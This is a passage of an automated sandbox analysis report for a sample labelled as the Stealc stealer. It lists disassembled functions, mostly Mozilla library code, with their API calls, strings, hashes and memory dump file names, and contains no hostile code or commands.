Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 6172704f6546a1b965b257ce2b873eed36c2e2de1c3e3b402d44e98d20792daf
Instruction ID: 7111f1dd98f00e24652bbb7bf042d7112b33255bc069fa979a0e5fa0c3b9d67f
Opcode Fuzzy Hash: 6172704f6546a1b965b257ce2b873eed36c2e2de1c3e3b402d44e98d20792daf
Instruction Fuzzy Hash: 6901FB38A04148EFCB04CF98C5857EC7BB5EF04309F688098E9156B350C775AF88DB95

Function 00CA9880 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,00CB0759,?,?), ref: 00CA9888

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: b01be33fae900cced6b10001096fd66371a14c57c9bdc91f849c542755b285c7
Instruction ID: c9c96628025d502be68fb321b9a36602837f221904e7a31536e823f220248c28
Opcode Fuzzy Hash: b01be33fae900cced6b10001096fd66371a14c57c9bdc91f849c542755b285c7
Instruction Fuzzy Hash: 1DF089B5D00208FFDB00EFE4D946BDDB7B4EB04304F108594F91597281E6749B14DB91

Non-executed Functions

Function 6BAEE2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6BAEE2A6), ref: 6BAEE35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6BAEE2A6), ref: 6BAEE386
GetCurrentThreadId.KERNEL32 ref: 6BAEE3E4
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BAEE4AB
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE4F5
GetCurrentThreadId.KERNEL32 ref: 6BAEE577
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE584
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BAEE8A6

Part of subcall function 6BAAB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BAAB7CF
Part of subcall function 6BAAB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BAAB808

Part of subcall function 6BAFB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6BB20FB6,00000000,?,?,6BAEE69E), ref: 6BAFB830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6BAEE6DA

Part of subcall function 6BAFB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6BAFB916
Part of subcall function 6BAFB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6BAFB94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BAEE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAEE883

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BAEE826, 6BAEE850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BAEE777
MOZ_PROFILER_STARTUP, xrefs: 6BAEE5A1, 6BAEE5CC, 6BAEE5FF, 6BAEE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BAEE655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BAEE722, 6BAEE750, 6BAEE7A2

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 9b84fda9a5d0986e81088730a86826ee77f18ee9d87d6c176827dc74e115f9a6
Instruction ID: 8eac5a24e379df8705d8ae0b138d432e061a3757579d138103c47e8fc483ae01
Opcode Fuzzy Hash: 9b84fda9a5d0986e81088730a86826ee77f18ee9d87d6c176827dc74e115f9a6
Instruction Fuzzy Hash: 2902CE75A00345DFCB50CF28C484A6AB7F5FF89304F44496DE99A9B340DB39E986CBA1

Function 6BAE5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BAE51DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BAE529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6BAE52FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BAE536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BAE53F7

Part of subcall function 6BADAB89: EnterCriticalSection.KERNEL32(6BB2E370,?,?,?,6BAA34DE,6BB2F6CC,?,?,?,?,?,?,?,6BAA3284), ref: 6BADAB94
Part of subcall function 6BADAB89: LeaveCriticalSection.KERNEL32(6BB2E370,?,6BAA34DE,6BB2F6CC,?,?,?,?,?,?,?,6BAA3284,?,?,6BAC56F6), ref: 6BADABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6BAE56C3
__Init_thread_footer.LIBCMT ref: 6BAE56E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6BAE56BE

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 1049d27dc1492b89b951c4c5cab0b555478f207b78cb61fa135ae3313b745fd1
Instruction ID: e372738e67b14d73f1e2f9e9f8ae4896acbd33fd6558de28d9f650b0c73ecf88
Opcode Fuzzy Hash: 1049d27dc1492b89b951c4c5cab0b555478f207b78cb61fa135ae3313b745fd1
Instruction Fuzzy Hash: 99E18E75914F45CACB12CE34D85126BB7B6BF9B380F109B4EE8AE2A150DF34E4879721

Function 6BB0B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BAB9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6BB0B92D), ref: 6BAB9BC8
Part of subcall function 6BAB9B80: __Init_thread_footer.LIBCMT ref: 6BAB9BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BAB03D4,?), ref: 6BB0B955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6BB0B9A5
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,00000000), ref: 6BB0BA20
RtlNtStatusToDosError.NTDLL ref: 6BB0BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BB0BA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BB0BA86

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: f47650da34e90c8c909bd083d078d41d6c4df053aaaa96eb172e5dbe297d150a
Instruction ID: 43a363f26961a02969268a861220edb8b84d1e6b0caeaea68204066ffab49270
Opcode Fuzzy Hash: f47650da34e90c8c909bd083d078d41d6c4df053aaaa96eb172e5dbe297d150a
Instruction Fuzzy Hash: 94514D71E01259DFDF24CEA8D981AEEBBB6EF88314F144129E905B7244DF38AD41CB91

Function 6BAE8AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BADFA80: GetCurrentThreadId.KERNEL32 ref: 6BADFA8D
Part of subcall function 6BADFA80: AcquireSRWLockExclusive.KERNEL32(6BB2F448), ref: 6BADFA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BB01563), ref: 6BAE8BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BB01563), ref: 6BAE8C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6BB01563), ref: 6BAE8C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6BB01563), ref: 6BAE8CBA
free.MOZGLUE(?), ref: 6BAE8CCF

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: 8f48649d3af9ff7108317610293e028cf232f18e24135b9e8ff61f4ae3eb7360
Instruction ID: 0b9c7961a56150325591e24f52347c07d8f0d391b3ba167592a89b7e35c9bca6
Opcode Fuzzy Hash: 8f48649d3af9ff7108317610293e028cf232f18e24135b9e8ff61f4ae3eb7360
Instruction Fuzzy Hash: 8B719F75A14B008FDB04CF29C58062AB7F1FF99314F458A9EE9899B362E774E8C1DB41

Function 6BAAF280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,?,00000000,?,0000001C,?), ref: 6BAAF2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6BAAF2F0
NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6BAAF308
RtlNtStatusToDosError.NTDLL ref: 6BAAF36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6BAAF371

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: ef2728bd38b20e66b9194d48d88020fb4789971ac9d2aa60da75aac2c2f4bf6e
Instruction ID: 0a599913431eeb2917d6a218fb3aa6af9557fdf695b1c77d18130f3bd26c3bdc
Opcode Fuzzy Hash: ef2728bd38b20e66b9194d48d88020fb4789971ac9d2aa60da75aac2c2f4bf6e
Instruction Fuzzy Hash: 07218F30A00248ABEF24EA62CD55BEF76B8AB44358F04422DE430D7180D7BA99C8C771

Function 6BB153C8 Relevance: 6.6, APIs: 5, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6BB186AE

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: e875ddb1817e4457f1b9f2d8427b291421c2366189536d5dfdf6414f54b69c49
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: C8C1B372A0415A8FCB24CF68CC91BEDB7B2EF85314F1502A9C949EB345D734A986CB90

Function 6BAB19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BB2F760), ref: 6BAB19BD
GetCurrentProcess.KERNEL32 ref: 6BAB19E5
GetLastError.KERNEL32 ref: 6BAB1A27
moz_xmalloc.MOZGLUE(?), ref: 6BAB1A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BAB1A4F
GetLastError.KERNEL32 ref: 6BAB1A92
moz_xmalloc.MOZGLUE(?), ref: 6BAB1AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BAB1ABA
LocalFree.KERNEL32(?), ref: 6BAB1C69
free.MOZGLUE(?), ref: 6BAB1C8F
free.MOZGLUE(?), ref: 6BAB1C9D
CloseHandle.KERNEL32(?), ref: 6BAB1CAE
ReleaseSRWLockExclusive.KERNEL32(6BB2F760), ref: 6BAB1D52
GetLastError.KERNEL32 ref: 6BAB1DA5
GetLastError.KERNEL32 ref: 6BAB1DFB
GetLastError.KERNEL32 ref: 6BAB1E49
GetLastError.KERNEL32 ref: 6BAB1E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAB1E9B

Part of subcall function 6BAB2070: LoadLibraryW.KERNEL32(combase.dll,6BAB1C5F), ref: 6BAB20AE
Part of subcall function 6BAB2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BAB20CD
Part of subcall function 6BAB2070: __Init_thread_footer.LIBCMT ref: 6BAB20E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6BAB1F15
VerSetConditionMask.NTDLL ref: 6BAB1F46
VerSetConditionMask.NTDLL ref: 6BAB1F52
VerSetConditionMask.NTDLL ref: 6BAB1F59
VerSetConditionMask.NTDLL ref: 6BAB1F60
VerifyVersionInfoW.KERNEL32 ref: 6BAB1F6D

Strings

D, xrefs: 6BAB1B57

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 112d6e6bd73991c41c42f7c53d22d846b6bb3039b46e56d22ca51a41eb125c8f
Instruction ID: 641af72b19649d49f43aa37ddf1edaa99f0d9bd52c1c7beb9153bab3f2221b3f
Opcode Fuzzy Hash: 112d6e6bd73991c41c42f7c53d22d846b6bb3039b46e56d22ca51a41eb125c8f
Instruction Fuzzy Hash: 47F16E71D10225AFEB209F65CD48BBAB7B8FF4A710F144199E915A7240E779ED80CFA0

Function 6BACBB80 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6BACBC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6BACBC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6BACBC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BACBE33
VerSetConditionMask.NTDLL ref: 6BACBE65
VerSetConditionMask.NTDLL ref: 6BACBE71
VerSetConditionMask.NTDLL ref: 6BACBE7D
VerSetConditionMask.NTDLL ref: 6BACBE89
VerifyVersionInfoW.KERNEL32 ref: 6BACBE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BACBEE4
VerSetConditionMask.NTDLL ref: 6BACBF15
VerSetConditionMask.NTDLL ref: 6BACBF21
VerSetConditionMask.NTDLL ref: 6BACBF2D
VerSetConditionMask.NTDLL ref: 6BACBF39
VerifyVersionInfoW.KERNEL32 ref: 6BACBF47

Part of subcall function 6BB0AAE0: GetCurrentThreadId.KERNEL32 ref: 6BB0AAF8
Part of subcall function 6BB0AAE0: EnterCriticalSection.KERNEL32(6BB2F770,?,6BACBF9F), ref: 6BB0AB08
Part of subcall function 6BB0AAE0: LeaveCriticalSection.KERNEL32(6BB2F770,?,?,?,?,?,?,?,?,6BACBF9F), ref: 6BB0AB6B

free.MOZGLUE(00000000), ref: 6BACBFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6BACC014

Part of subcall function 6BB0AC20: CreateFileW.KERNEL32 ref: 6BB0AC52
Part of subcall function 6BB0AC20: CreateFileMappingW.KERNEL32 ref: 6BB0AC7D
Part of subcall function 6BB0AC20: GetSystemInfo.KERNEL32 ref: 6BB0AC98
Part of subcall function 6BB0AC20: MapViewOfFile.KERNEL32 ref: 6BB0ACB0
Part of subcall function 6BB0AC20: GetSystemInfo.KERNEL32 ref: 6BB0ACCD
Part of subcall function 6BB0AC20: MapViewOfFile.KERNEL32 ref: 6BB0AD05
Part of subcall function 6BB0AC20: UnmapViewOfFile.KERNEL32 ref: 6BB0AD1C
Part of subcall function 6BB0AC20: CloseHandle.KERNEL32 ref: 6BB0AD28
Part of subcall function 6BB0AC20: UnmapViewOfFile.KERNEL32 ref: 6BB0AD37
Part of subcall function 6BB0AC20: CloseHandle.KERNEL32 ref: 6BB0AD43

Part of subcall function 6BB0AE70: GetCurrentThreadId.KERNEL32 ref: 6BB0AE85
Part of subcall function 6BB0AE70: EnterCriticalSection.KERNEL32(6BB2F770,?,6BACC034), ref: 6BB0AE96
Part of subcall function 6BB0AE70: LeaveCriticalSection.KERNEL32(6BB2F770,?,?,?,?,6BACC034), ref: 6BB0AEBD

Strings

LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6BACBDDD
accelerator.dll, xrefs: 6BACBC8E, 6BACBC9D
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6BACBFCF
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6BACBF5B

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3373514183
Opcode ID: d889a27488deadb1aed567985beff493f579720480ac3e8082bd182783fbcaf1
Instruction ID: 4381b959c8fa4bbe654dc6e95b33e3a0a4d39211f78ecc87953279996f5af093
Opcode Fuzzy Hash: d889a27488deadb1aed567985beff493f579720480ac3e8082bd182783fbcaf1
Instruction Fuzzy Hash: 53E1E6719083449FEF118B24C885B7FB7E5EF95704F444A2DE8858B281DB7AE984CB93

Function 6BAB4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6BAB4196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BAB41F1
VerSetConditionMask.NTDLL ref: 6BAB4223
VerSetConditionMask.NTDLL ref: 6BAB422A
VerSetConditionMask.NTDLL ref: 6BAB4231
VerSetConditionMask.NTDLL ref: 6BAB4238
VerifyVersionInfoW.KERNEL32 ref: 6BAB4245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BAB4263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6BAB427A
FreeLibrary.KERNEL32(?), ref: 6BAB4299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6BAB42C4
VerSetConditionMask.NTDLL ref: 6BAB42F6
VerSetConditionMask.NTDLL ref: 6BAB4302
VerSetConditionMask.NTDLL ref: 6BAB4309
VerSetConditionMask.NTDLL ref: 6BAB4310
VerSetConditionMask.NTDLL ref: 6BAB4317
VerifyVersionInfoW.KERNEL32 ref: 6BAB4324

Strings

Shcore.dll, xrefs: 6BAB425E
SetProcessDpiAwareness, xrefs: 6BAB4274

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 6651e114a1694be5aa2c71d7077660b01ecaee5862b5d1f90c95e684d1c81f9b
Instruction ID: 707e3fea75d73e7a45982def0bb9386d584e63dba429f67f655b8ed54ea027ad
Opcode Fuzzy Hash: 6651e114a1694be5aa2c71d7077660b01ecaee5862b5d1f90c95e684d1c81f9b
Instruction Fuzzy Hash: 7A510F72A002146BEF206B75CD09BBE776CEF86B10F054529F915AB1C0CF79D980CBA0

Function 6BAEFAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAEFADC
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEFAE9
GetCurrentThreadId.KERNEL32 ref: 6BAEFB31
GetCurrentThreadId.KERNEL32 ref: 6BAEFB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BAEFBF6
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEFC50

Strings

